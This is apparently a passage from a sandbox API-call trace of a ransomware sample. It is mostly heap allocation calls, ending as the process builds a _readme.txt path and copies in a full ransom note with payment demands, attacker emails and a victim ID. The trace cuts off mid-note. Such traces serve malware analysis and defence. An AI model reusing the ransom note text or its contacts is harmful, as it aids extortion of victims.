wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.503] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0184.503] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.503] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.503] PathFindFileNameW (pszPath="") returned="" [0184.503] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.504] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.504] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.504] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.505] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0184.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.505] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0184.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.505] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 